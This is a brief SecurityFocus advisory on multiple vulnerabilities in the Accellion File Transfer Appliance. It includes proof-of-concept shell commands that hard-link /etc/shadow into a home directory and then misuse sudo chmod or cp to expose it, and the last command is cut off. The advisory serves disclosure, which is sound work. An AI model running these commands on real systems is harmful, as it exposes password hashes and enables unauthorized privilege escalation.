Accellion File Transfer Appliance Multiple Remote Vulnerabilities

An attacker can use readily available network utilities to exploit some of these issues. For the HTML-injection and directory-traversal issues, the attacker can use a browser.

The following proofs of concept are available:

sh-2.05b$ ln /etc/shadow /home/admin/oldtemp
sh-2.05b$ sudo /bin/chmod 666 /home/admin/oldtemp

sh-2.05b$ ln /etc/shadow /home/admin/temp
sh-2.05b$ sudo /bin/cp /home/admin/temp /etc/mail/

sh-2.05b$ sudo /usr/local/bin/


Privacy Statement
Copyright 2010, SecurityFocus